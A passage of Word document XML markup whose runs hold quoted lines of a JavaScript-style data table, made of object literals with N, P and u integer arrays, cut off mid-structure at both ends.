    <w:p w14:paraId="4C57A26B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 8, 13, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FEC879" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DAF7C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [52, 80, 84, 162, 198, 340]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4222069B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E644AFE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589DAE37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343159CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 9, 12, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F2E44" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEDF43" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB7F124" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAAF030" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD0986" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F33A57" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11DB38" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413D55A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 21]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECA7A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE86FDC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C181B9E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E86E49" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBEA52" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB912BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301103C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C9B8D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 77]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C4CCA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EBCD28" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A2AA2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B25E0C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CEB9FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC2119F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B048F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345ACF45" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACE646F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEFAC0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A82B43" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6990A08C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C1AAF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A48A722" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20408B0F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672391C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C0BCE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7DC47D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7C369" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04403803" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 3, 4, 7, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB18CA7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6DBA08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [18, 3, 4, 17, 2, 15, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886BD2A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7413E2A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 306]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA0352" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618E298B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4, 5, 6, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCA1A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C322337" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [63, 81, 90, 103, 144, 180, 188, 243, 249, 280, 282, 283, 313, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DBA83" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54692302" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6070E163" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65836EC0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 14, 16, 19, 178, 249, 282, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3CA924" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7831D1C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4970F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7FC46A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669F0D0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC44678" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD063E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37947300" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C8CAF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7DEC91" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E94C18" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B191142" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB7D0F7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [34]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D87237" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA283B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A303BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD2DC05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [216]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FA9C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B30D172" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFC506" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55966360" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 7, 10, 11, 14, 23, 40, 200, 219, 249, 277, 282, 283, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F3ECF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C93204" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C907A61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB3942E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 4, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48AAB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 5, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C9E7A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8BBD8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADB46EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693CDCCB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF4AC2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D13EDB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [18, 21, 8, 28],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209334EA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A61A7A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [6, 9, 39, 48, 55, 61, 95, 98, 99, 105, 116, 118, 120, 126, 137, 185, 194, 196, 201, 237, 248, 271, 281, 301, 346, 350]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F69D025" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3962D570" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA2F3CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6, 9, 12, 14, 15, 16, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F7EDF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 7, 8, 10, 11, 13, 20, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55631FD4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C8FAA8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7744D56C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 13, 14, 15, 16, 19, 20, 21, 22],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BC7AA2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 7, 17, 18, 25, 27, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B96FFF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A46A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754462C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E79C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 6, 7, 8, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E1DEEC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B31B63D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2905F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6E3B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [83, 184, 199, 302, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E9ED05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036AC11" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73B415" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD07468" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110E756D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBA08D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230B25C7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB51423" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2828B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6E3D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF84AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651A51B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4537E8DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [109]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CECF08E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D526A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24383E1E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3C4F7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3797F6D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE4ADE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEF778A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9CB10" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
